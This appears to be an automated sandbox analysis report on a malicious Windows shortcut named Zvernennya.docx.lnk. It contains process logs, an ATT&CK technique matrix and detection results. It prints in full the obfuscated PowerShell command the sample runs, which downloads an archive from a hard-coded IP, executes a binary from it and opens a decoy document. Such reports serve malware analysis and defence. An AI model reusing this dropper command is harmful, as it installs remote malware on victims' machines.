Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000000.00000002.1415700621.000001DD9F8DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: powershell.exe, 00000000.00000002.1453912574.000001DDB630C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -win 1 echo dtavxkbkfxvhqpxrveuvipleyxsphokfblikjiihsehnhhr; if (-not(test-path 'avast.z''i''p' -pathtype leaf)){&(get-command in???e-webr**) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/avast.z''i''p -outfile avast.z''i''p}; sleep 0.01; measure-object | out-null; echo wtnawpfenzdkuenxjlpincyhdjtkybsfpqniqouhamggtznphavgdmhoidox; $hehe = 'expand-archive -path avast.z''i''p -destinationpath x64updtr'; iex -debug -verbose -errorvariable $e -informationaction ignore -warningaction inquire $hehe; echo lvsvudxpguqlwaowxchhhjwjyknzkqyosu; $nothehe = 'st''ar''t x64updtr/abschedhlp.e''x''e'; echo kidsuyvnxdksbubvqlnvhydeh; iex -debug -verbose -errorvariable $ee -informationaction ignore -warningaction inquire $nothehe; &(get-command in???e-webre************************) -uri ht''tp'':/''/1''46''.1''85''.2''39''.1''0/burka/zvernennya.docx -outfile zvernennya.docx; sleep 0.01; get-process | out-null; echo qvblejalzjcinucbtmau; st''ar''t zvernennya.docx; echo dtoinnadpckpmsunxuyylqhnonffbzxsunuemoandjdyffeqtlbgslofcvsc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Zvernennya.docx.lnk18%ReversingLabsBinary.Trojan.Boxter
Zvernennya.docx.lnk44%VirustotalBrowse
SAMPLE100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://146.185.239.10/avast.zip0%Avira URL Cloudsafe
https://go.micro/fwlink/?LinkId=0%Avira URL Cloudsafe
http://146.185.239.100%Avira URL Cloudsafe
http://146.185.239.10/burka/Zvernennya.docx0%Avira URL Cloudsafe

